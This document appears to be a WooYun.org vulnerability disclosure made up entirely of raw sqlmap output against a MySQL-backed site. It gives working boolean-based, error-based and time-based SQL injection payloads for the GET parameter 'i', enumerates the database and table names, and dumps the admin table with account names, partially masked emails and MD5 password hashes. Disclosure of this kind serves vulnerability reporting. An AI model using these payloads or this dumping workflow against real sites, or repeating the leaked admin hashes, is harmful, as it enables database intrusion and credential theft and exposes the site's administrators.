WooYun.org

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: i (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: i=1 AND 3598=3598
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: i=1 AND (SELECT 8960 FROM(SELECT COUNT(*),CONCAT(0x716b786b71,(SELECT (ELT(8960=8960,1))),0x717a7a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: i=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ErnH)
---
web application technology: Apache
back-end DBMS: MySQL 5.0
current user:    '[email protected].%'
current database:    'DBL02554'
current user is DBA:    False
available databases [2]:
[*] DBL02554
[*] information_schema

Database: DBL02554
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| admin_log        | 157     |
| news_album       | 44      |
| product_album    | 41      |
| faq_album        | 22      |
| member_album     | 8       |
| product_kind_sub | 8       |
| web_album        | 8       |
| admin_block      | 7       |
| channel_album    | 7       |
| admin            | 3       |
| product_kind     | 2       |
+------------------+---------+

Table: admin
[9 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| level    | int(1)       |
| a_id     | bigint(1)    |
| account  | varchar(20)  |
| email    | varchar(200) |
| lastdate | datetime     |
| name     | varchar(10)  |
| pwd      | varchar(60)  |
| que      | int(3)       |
| statu    | int(1)       |
+----------+--------------+
Database: DBL02554
Table: admin
[3 entries]
+------+-------------------------------------+-----+---------+-------+------------------------+---------+---------+---------------------+
| a_id | pwd                                 | que | name    | statu | email                  | level   | account | lastdate            |
+------+-------------------------------------+-----+---------+-------+------------------------+---------+---------+---------------------+
| 1    | 987a7bec28f18f4ec07777294855266d    | 1   | 里歐      | 2     | leoyeh@**.**.**.**      | 1       | leoyeh  | 2013-06-11 00:04:36 |
| 2    | 5768d3c648f6569bd08ac218cc106d88    | 0   | Caprina | 1     | caprina@**.**.**.** | 2       | admin   | 2015-12-22 13:59:21 |
| 3    | d41d8cd98f00b204e9800998ecf8427e () | 0   | Aaa as  | 2     | Zzz                    | 2       | Zzz     | 2013-05-29 08:38:01 |
+------+-------------------------------------+-----+---------+-------+------------------------+---------+---------+---------------------+